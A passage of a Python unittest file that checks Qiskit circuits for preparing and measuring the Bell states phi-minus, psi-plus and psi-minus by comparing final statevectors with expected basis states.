# Test #1 for prepare and measure the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare of the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩);
# 3) Measure the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩),
# by inverting the Quantum Circuit of Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩);
def test_prepare_and_measure_bell_state_phi_minus_00(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_phi_minus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatephiminus", num_qubits)
qiskit_classical_register_bell_state_phi_minus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatephiminus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and Classical Registers
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatephiminus",
qiskit_quantum_register_bell_state_phi_minus,
qiskit_classical_register_bell_state_phi_minus,
global_phase=0)
# Prepare the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_phi_minus_prepared = QiskitBellState \
.QiskitBellState("bell_state_phi_minus",
"BELL_STATE_PHI_MINUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_phi_minus_measured = QiskitBellState \
.QiskitBellState("bell_state_phi_minus",
"BELL_STATE_PHI_MINUS",
qiskit_quantum_circuit_bell_state_phi_minus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_phi_minus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_phi_minus_array_00 = array([(1. + 0.j),
(0. + 0.j),
(0. + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State be prepared
assert_allclose(final_state_vector, qiskit_bell_state_phi_minus_array_00, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #2 for prepare and measure the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare the Quantum State |01⟩, by applying the Pauli-X Gate on the 1st Qubit;
# 3) Prepare of the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩);
# 4) Measure the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩),
# by inverting the Quantum Circuit of Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩);
def test_prepare_and_measure_bell_state_phi_minus_01(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_phi_minus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatephiminus", num_qubits)
qiskit_classical_register_bell_state_phi_minus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatephiminus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and Classical Registers
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatephiminus",
qiskit_quantum_register_bell_state_phi_minus,
qiskit_classical_register_bell_state_phi_minus,
global_phase=0)
# Prepare the Quantum State |01⟩, by applying the Pauli-X Gate on the 1st Qubit
qiskit_quantum_circuit_2_qubits.apply_pauli_x(0)
# Prepare the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩), for 2 Qubits
qiskit_quantum_circuit_epr_pair_bell_state_phi_minus_prepared = QiskitBellState \
.QiskitBellState("bell_state_phi_minus",
"BELL_STATE_PHI_MINUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_phi_minus_measured = QiskitBellState \
.QiskitBellState("bell_state_phi_minus",
"BELL_STATE_PHI_MINUS",
qiskit_quantum_circuit_epr_pair_bell_state_phi_minus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_phi_minus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_phi_minus_array_01 = array([(0. + 0.j),
(1. + 0.j),
(0. + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State be prepared
assert_allclose(final_state_vector, qiskit_bell_state_phi_minus_array_01, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #3 for prepare and measure the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare the Quantum State |10⟩, by applying the Pauli-X Gate on the 2nd Qubit;
# 3) Prepare of the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩);
# 4) Measure the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩),
# by inverting the Quantum Circuit of Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩);
def test_prepare_and_measure_bell_state_phi_minus_10(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_phi_minus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatephiminus", num_qubits)
qiskit_classical_register_bell_state_phi_minus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatephiminus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and Classical Registers
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatephiminus",
qiskit_quantum_register_bell_state_phi_minus,
qiskit_classical_register_bell_state_phi_minus,
global_phase=0)
# Prepare the Quantum State |10⟩, by applying the Pauli-X Gate on the 2nd Qubit
qiskit_quantum_circuit_2_qubits.apply_pauli_x(1)
# Prepare the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_phi_minus_prepared = QiskitBellState \
.QiskitBellState("bell_state_phi_minus",
"BELL_STATE_PHI_MINUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_phi_minus_measured = QiskitBellState \
.QiskitBellState("bell_state_phi_minus",
"BELL_STATE_PHI_MINUS",
qiskit_quantum_circuit_bell_state_phi_minus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_phi_minus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_phi_minus_array_10 = array([(0. + 0.j),
(0. + 0.j),
(1. + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State be prepared
assert_allclose(final_state_vector, qiskit_bell_state_phi_minus_array_10, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #4 for prepare and measure the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare the Quantum State |11⟩,
# by applying the Pauli-X Gate on both of the 1st and 2nd Qubits;
# 3) Prepare of the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩);
# 4) Measure the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩),
# by inverting the Quantum Circuit of Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩);
def test_prepare_and_measure_bell_state_phi_minus_11(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_phi_minus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatephiminus", num_qubits)
qiskit_classical_register_bell_state_phi_minus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatephiminus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and Classical Registers
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatephiminus",
qiskit_quantum_register_bell_state_phi_minus,
qiskit_classical_register_bell_state_phi_minus,
global_phase=0)
# Prepare the Quantum State |11⟩, by applying the Pauli-X Gate on both of the 1st and 2nd Qubits
qiskit_quantum_circuit_2_qubits.apply_pauli_x(0)
qiskit_quantum_circuit_2_qubits.apply_pauli_x(1)
# Prepare the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_phi_minus_prepared = QiskitBellState \
.QiskitBellState("bell_state_phi_minus",
"BELL_STATE_PHI_MINUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State, |ϕ^-⟩ = 1/sqrt(2) x (|00⟩ - |11⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_phi_minus_measured = QiskitBellState \
.QiskitBellState("bell_state_phi_minus",
"BELL_STATE_PHI_MINUS",
qiskit_quantum_circuit_bell_state_phi_minus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_phi_minus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_phi_minus_array_11 = array([(0. + 0.j),
(0. + 0.j),
(0. + 0.j),
(1. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State be prepared
assert_allclose(final_state_vector, qiskit_bell_state_phi_minus_array_11, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test Cases for prepare and measure the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩)
class PrepareAndMeasureBellStatePsiPlusTests(unittest.TestCase):
# Test #1 for prepare and measure the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare of the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩);
# 3) Measure the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩),
# by inverting the Quantum Circuit of Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩);
def test_prepare_and_measure_bell_state_psi_plus_00(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_psi_plus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatepsiplus", num_qubits)
qiskit_classical_register_bell_state_psi_plus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatepsiplus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and Classical Registers
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatepsiplus",
qiskit_quantum_register_bell_state_psi_plus,
qiskit_classical_register_bell_state_psi_plus,
global_phase=0)
# Prepare the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_plus_prepared = QiskitBellState \
.QiskitBellState("bell_state_psi_plus",
"BELL_STATE_PSI_PLUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_plus_measured = QiskitBellState \
.QiskitBellState("bell_state_psi_plus",
"BELL_STATE_PSI_PLUS",
qiskit_quantum_circuit_bell_state_psi_plus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_psi_plus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_psi_plus_array_00 = array([(1. + 0.j),
(0. + 0.j),
(0. + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State be prepared
assert_allclose(final_state_vector, qiskit_bell_state_psi_plus_array_00, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #2 for prepare and measure the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare the Quantum State |01⟩, by applying the Pauli-X Gate on the 1st Qubit;
# 3) Prepare of the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩);
# 4) Measure the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩),
# by inverting the Quantum Circuit of Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩);
def test_prepare_and_measure_bell_state_psi_plus_01(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_psi_plus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatepsiplus", num_qubits)
qiskit_classical_register_bell_state_psi_plus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatepsiplus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and Classical Registers
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatepsiplus",
qiskit_quantum_register_bell_state_psi_plus,
qiskit_classical_register_bell_state_psi_plus,
global_phase=0)
# Prepare the Quantum State |01⟩, by applying the Pauli-X Gate on the 1st Qubit
qiskit_quantum_circuit_2_qubits.apply_pauli_x(0)
# Prepare the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_plus_prepared = QiskitBellState \
.QiskitBellState("bell_state_psi_plus",
"BELL_STATE_PSI_PLUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_plus_measured = QiskitBellState \
.QiskitBellState("bell_state_psi_plus",
"BELL_STATE_PSI_PLUS",
qiskit_quantum_circuit_bell_state_psi_plus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_psi_plus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_psi_plus_array_01 = array([(0. + 0.j),
(1. + 0.j),
(0. + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State be prepared
assert_allclose(final_state_vector, qiskit_bell_state_psi_plus_array_01, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #3 for prepare and measure the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare the Quantum State |10⟩, by applying the Pauli-X Gate on the 2nd Qubit;
# 3) Prepare of the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩);
# 4) Measure the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩),
# by inverting the Quantum Circuit of Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩);
def test_prepare_and_measure_bell_state_psi_plus_10(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_psi_plus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatepsiplus", num_qubits)
qiskit_classical_register_bell_state_psi_plus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatepsiplus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and Classical Registers
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatepsiplus",
qiskit_quantum_register_bell_state_psi_plus,
qiskit_classical_register_bell_state_psi_plus,
global_phase=0)
# Prepare the Quantum State |10⟩, by applying the Pauli-X Gate on the 2nd Qubit
qiskit_quantum_circuit_2_qubits.apply_pauli_x(1)
# Prepare the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_plus_prepared = QiskitBellState \
.QiskitBellState("bell_state_psi_plus",
"BELL_STATE_PSI_PLUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_plus_measured = QiskitBellState \
.QiskitBellState("bell_state_psi_plus",
"BELL_STATE_PSI_PLUS",
qiskit_quantum_circuit_bell_state_psi_plus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_psi_plus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_psi_plus_array_10 = array([(0. + 0.j),
(0. + 0.j),
(1. + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State be prepared
assert_allclose(final_state_vector, qiskit_bell_state_psi_plus_array_10, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #4 for prepare and measure the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare the Quantum State |11⟩,
# by applying the Pauli-X Gate on both of the 1st and 2nd Qubits;
# 3) Prepare of the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩);
# 4) Measure the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩),
# by inverting the Quantum Circuit of Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩);
def test_prepare_and_measure_bell_state_psi_plus_11(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_psi_plus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatepsiplus", num_qubits)
qiskit_classical_register_bell_state_psi_plus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatepsiplus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and Classical Registers
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatepsiplus",
qiskit_quantum_register_bell_state_psi_plus,
qiskit_classical_register_bell_state_psi_plus,
global_phase=0)
# Prepare the Quantum State |11⟩, by applying the Pauli-X Gate on both of the 1st and 2nd Qubits
qiskit_quantum_circuit_2_qubits.apply_pauli_x(0)
qiskit_quantum_circuit_2_qubits.apply_pauli_x(1)
# Prepare the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_plus_prepared = QiskitBellState \
.QiskitBellState("bell_state_psi_plus",
"BELL_STATE_PSI_PLUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State, |ψ^+⟩ = 1/sqrt(2) x (|01⟩ + |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_plus_measured = QiskitBellState \
.QiskitBellState("bell_state_psi_plus",
"BELL_STATE_PSI_PLUS",
qiskit_quantum_circuit_bell_state_psi_plus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_psi_plus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_psi_plus_array_11 = array([(0. + 0.j),
(0. + 0.j),
(0. + 0.j),
(1. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State be prepared
assert_allclose(final_state_vector, qiskit_bell_state_psi_plus_array_11, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test Cases for prepare and measure the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩)
class PrepareAndMeasureBellStatePsiMinusTests(unittest.TestCase):
# Test #1 for prepare and measure the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare of the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩);
# 3) Measure the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩),
# by inverting the Quantum Circuit of Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩);
def test_prepare_and_measure_bell_state_psi_minus_00(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_psi_minus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatepsiminus", num_qubits)
qiskit_classical_register_bell_state_psi_minus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatepsiminus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and Classical Registers
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatepsiminus",
qiskit_quantum_register_bell_state_psi_minus,
qiskit_classical_register_bell_state_psi_minus,
global_phase=0)
# Prepare the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_minus_prepared = QiskitBellState \
.QiskitBellState("bell_state_psi_minus",
"BELL_STATE_PSI_MINUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_minus_measured = QiskitBellState \
.QiskitBellState("bell_state_psi_minus",
"BELL_STATE_PSI_MINUS",
qiskit_quantum_circuit_bell_state_psi_minus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_psi_minus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_psi_minus_array_00 = array([(1. + 0.j),
(0. + 0.j),
(0. + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State be prepared
assert_allclose(final_state_vector, qiskit_bell_state_psi_minus_array_00, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #2 for prepare and measure the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Prepare the Quantum State |01⟩, by applying the Pauli-X Gate on the 1st Qubit;
# 3) Prepare of the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩);
# 4) Measure the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩),
# by inverting the Quantum Circuit of Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩);
def test_prepare_and_measure_bell_state_psi_minus_01(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_bell_state_psi_minus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatepsiplus", num_qubits)
qiskit_classical_register_bell_state_psi_minus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatepsiminus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and Classical Registers
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatepsiminus",
qiskit_quantum_register_bell_state_psi_minus,
qiskit_classical_register_bell_state_psi_minus,
global_phase=0)
# Prepare the Quantum State |01⟩, by applying the Pauli-X Gate on the 1st Qubit
qiskit_quantum_circuit_2_qubits.apply_pauli_x(0)
# Prepare the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_minus_prepared = QiskitBellState \
.QiskitBellState("bell_state_psi_minus",
"BELL_STATE_PSI_MINUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Measure the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩), for 2 Qubits
qiskit_quantum_circuit_bell_state_psi_minus_measured = QiskitBellState \
.QiskitBellState("bell_state_psi_minus",
"BELL_STATE_PSI_MINUS",
qiskit_quantum_circuit_bell_state_psi_minus_prepared,
0, 1).measure_bipartite_entanglement(is_final_measurement=False)
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_bell_state_psi_minus_measured.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's complex values
qiskit_bell_state_psi_minus_array_01 = array([(0. + 0.j),
(1. + 0.j),
(0. + 0.j),
(0. + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the Bell State be prepared
assert_allclose(final_state_vector, qiskit_bell_state_psi_minus_array_01, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
# Test #3 for prepare and measure the Bell State, |ψ^-⟩ = 1/sqrt(2) x (|01⟩ - |10⟩)
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
